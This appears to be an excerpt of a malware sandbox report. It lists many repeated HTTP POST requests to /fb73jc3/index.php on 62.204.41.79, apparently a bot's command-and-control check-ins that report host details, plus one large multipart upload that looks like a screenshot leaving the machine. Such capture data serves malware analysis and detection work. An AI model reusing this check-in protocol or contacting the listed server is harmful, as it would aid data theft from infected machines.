                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MTA1ODE2Host: 62.204.41.79Content-Length: 105968Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
